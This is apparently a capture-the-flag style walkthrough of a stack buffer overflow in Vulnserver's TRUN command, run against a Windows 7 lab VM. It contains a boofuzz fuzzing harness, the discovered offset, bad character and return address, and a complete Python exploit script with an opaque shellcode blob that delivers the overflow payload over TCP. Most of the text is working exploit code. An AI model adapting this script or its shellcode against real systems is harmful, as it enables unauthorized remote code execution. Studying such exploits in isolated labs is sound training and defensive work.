Vulnserver TRUN exploit Walkthrough

Reference: stephenbradshaw/vulnserver
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC
target ip 192.168.1.6

fuzz

fuzz_trun.py
#!/usr/bin/env python3
# boofuzz harness for Vulnserver's TRUN command.
#
# Vulnserver (stephenbradshaw/vulnserver) is an intentionally vulnerable
# training service. This script sends "TRUN " followed by a mutated string
# so that a crash in the TRUN handler can be observed on the lab target
# (e.g. in a debugger attached to the service).
from boofuzz import *

# Lab target from the walkthrough; keep this pointing at an isolated test VM.
host = "192.168.1.6"
port = 9999

# One fuzzing session over a plain TCP connection to host:port.
# sleep_time=1 pauses one second between test cases, which makes a
# crash/restart of the service easier to spot while watching the target.
session = Session(
target=Target(
connection=SocketConnection(host, port)
), sleep_time=1)

# Request definition: the command keyword and the separating space are
# fixed (fuzzable=False); only the argument string is left fuzzable.
s_initialize("trun")
s_string("TRUN", fuzzable=False)
s_delim(" ", fuzzable=False)
s_string("data")

# Attach the "trun" request to the session graph.
session.connect(s_get("trun"))

# Run the test cases; this blocks until fuzzing finishes or is interrupted.
session.fuzz()

Bad characters

analysis omitted
\x00

offset

analysis omitted
2003

return address

analysis omitted
essfunc.dll 0x625011af

exploit.py

exploit.py
#!/usr/bin/env python3
# Proof-of-concept for the Vulnserver TRUN stack overflow described in the
# walkthrough above. Payload layout, in order: 2003 bytes of filler (the
# offset found earlier), the 4-byte return address into essfunc.dll, a short
# NOP sled, the shellcode, then padding to a fixed total of 5000 bytes.
# Intended only for the isolated Windows 7 lab VM named in the walkthrough.

import socket
import os   # not used anywhere in this script
import sys  # not used anywhere in this script

# Lab target from the walkthrough.
host = "192.168.1.6"
port = 9999

# Opaque shellcode blob copied from the walkthrough. The generator and the
# options used to produce it are not given on this page, so nothing here
# documents what it does. It appears to contain no 0x00 byte, which is
# consistent with \x00 being the bad character identified earlier.
shellcode = b""
shellcode += b"\xba\x9f\xf8\x62\x7b\xdb\xc5\xd9\x74\x24\xf4"
shellcode += b"\x5f\x2b\xc9\xb1\x52\x31\x57\x12\x03\x57\x12"
shellcode += b"\x83\x58\xfc\x80\x8e\x9a\x15\xc6\x71\x62\xe6"
shellcode += b"\xa7\xf8\x87\xd7\xe7\x9f\xcc\x48\xd8\xd4\x80"
shellcode += b"\x64\x93\xb9\x30\xfe\xd1\x15\x37\xb7\x5c\x40"
shellcode += b"\x76\x48\xcc\xb0\x19\xca\x0f\xe5\xf9\xf3\xdf"
shellcode += b"\xf8\xf8\x34\x3d\xf0\xa8\xed\x49\xa7\x5c\x99"
shellcode += b"\x04\x74\xd7\xd1\x89\xfc\x04\xa1\xa8\x2d\x9b"
shellcode += b"\xb9\xf2\xed\x1a\x6d\x8f\xa7\x04\x72\xaa\x7e"
shellcode += b"\xbf\x40\x40\x81\x69\x99\xa9\x2e\x54\x15\x58"
shellcode += b"\x2e\x91\x92\x83\x45\xeb\xe0\x3e\x5e\x28\x9a"
shellcode += b"\xe4\xeb\xaa\x3c\x6e\x4b\x16\xbc\xa3\x0a\xdd"
shellcode += b"\xb2\x08\x58\xb9\xd6\x8f\x8d\xb2\xe3\x04\x30"
shellcode += b"\x14\x62\x5e\x17\xb0\x2e\x04\x36\xe1\x8a\xeb"
shellcode += b"\x47\xf1\x74\x53\xe2\x7a\x98\x80\x9f\x21\xf5"
shellcode += b"\x65\x92\xd9\x05\xe2\xa5\xaa\x37\xad\x1d\x24"
shellcode += b"\x74\x26\xb8\xb3\x7b\x1d\x7c\x2b\x82\x9e\x7d"
shellcode += b"\x62\x41\xca\x2d\x1c\x60\x73\xa6\xdc\x8d\xa6"
shellcode += b"\x69\x8c\x21\x19\xca\x7c\x82\xc9\xa2\x96\x0d"
shellcode += b"\x35\xd2\x99\xc7\x5e\x79\x60\x80\xa0\xd6\x6b"
shellcode += b"\x09\x49\x25\x6b\xa8\x32\xa0\x8d\xc0\x54\xe5"
shellcode += b"\x06\x7d\xcc\xac\xdc\x1c\x11\x7b\x99\x1f\x99"
shellcode += b"\x88\x5e\xd1\x6a\xe4\x4c\x86\x9a\xb3\x2e\x01"
shellcode += b"\xa4\x69\x46\xcd\x37\xf6\x96\x98\x2b\xa1\xc1"
shellcode += b"\xcd\x9a\xb8\x87\xe3\x85\x12\xb5\xf9\x50\x5c"
shellcode += b"\x7d\x26\xa1\x63\x7c\xab\x9d\x47\x6e\x75\x1d"
shellcode += b"\xcc\xda\x29\x48\x9a\xb4\x8f\x22\x6c\x6e\x46"
shellcode += b"\x98\x26\xe6\x1f\xd2\xf8\x70\x20\x3f\x8f\x9c"
shellcode += b"\x91\x96\xd6\xa3\x1e\x7f\xdf\xdc\x42\x1f\x20"
shellcode += b"\x37\xc7\x2f\x6b\x15\x6e\xb8\x32\xcc\x32\xa5"
shellcode += b"\xc4\x3b\x70\xd0\x46\xc9\x09\x27\x56\xb8\x0c"
shellcode += b"\x63\xd0\x51\x7d\xfc\xb5\x55\xd2\xfd\x9f"

# Command prefix used by the walkthrough to reach the TRUN handler.
payload = b"TRUN /.:/"
# Filler up to the offset (2003) found during offset discovery.
payload += b"A"*2003
# Return address 0x625011af (essfunc.dll) written in little-endian byte order.
payload += b"\xaf\x11\x50\x62"
# Short NOP sled in front of the shellcode.
payload += b"\x90" * 16

payload += shellcode
# Pad so the request is always exactly 5000 bytes long.
payload += b"C" * (5000 - len(payload))

# Detection note: on the wire this attempt is a "TRUN" command carrying a
# multi-kilobyte argument made up of long runs of a single byte (0x41 and
# 0x43) — an easy signature for network monitoring of this lab service.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
# Consume the server's initial response before sending the request.
s.recv(1024)
s.send(payload)
s.close()